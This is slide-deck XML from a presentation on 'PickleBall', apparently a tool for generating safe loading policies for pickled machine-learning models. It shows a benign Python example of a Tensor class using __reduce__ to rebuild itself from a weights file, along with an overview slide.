                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>__init__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>, weights: Tensor):</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>.weights = weights</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Tensor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>__reduce__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>        return (read_weights_to_tensor, (self.filename,))</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>read_weights_to_tensor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>(filename: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>) -&gt; Tensor:</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>    # Read a weights file and return a Tensor</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714" name="Google Shape;714;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3605575" y="1828425"/>
            <a:ext cx="503400" cy="205500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="CC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Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="715" name="Google Shape;715;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2356775" y="2604525"/>
            <a:ext cx="1752300" cy="205500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="CC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Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="716" name="Google Shape;716;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4280525" y="3747825"/>
            <a:ext cx="1200600" cy="152100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="CC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Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="717" name="Google Shape;717;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4280525" y="3950925"/>
            <a:ext cx="2499900" cy="152100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="CC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Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="718" name="Google Shape;718;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6201325" y="3595125"/>
            <a:ext cx="2746500" cy="863700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>A: We can look at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> class definition.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="719" name="Google Shape;719;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1624375" y="1676025"/>
            <a:ext cx="405000" cy="205500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="CC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Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="720" name="Google Shape;720;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4280525" y="3577925"/>
            <a:ext cx="889200" cy="152100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="CC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Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>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4" name="Shape 724"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="725" name="Google Shape;725;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Overview</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="726" name="Google Shape;726;p60"/>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727" name="Google Shape;727;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1987575" y="1830850"/>
            <a:ext cx="5286000" cy="2429100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9EAD3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="7925">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="76150" lIns="76150" spcFirstLastPara="1" rIns="76150" wrap="square" tIns="76150">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1165">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>PickleBall</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1165">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="728" name="Google Shape;728;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2370115" y="2214006"/>
            <a:ext cx="1359300" cy="1921800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="7925">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="76150" lIns="76150" spcFirstLastPara="1" rIns="76150" wrap="square" tIns="76150">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1165">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Policy Generation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1165">
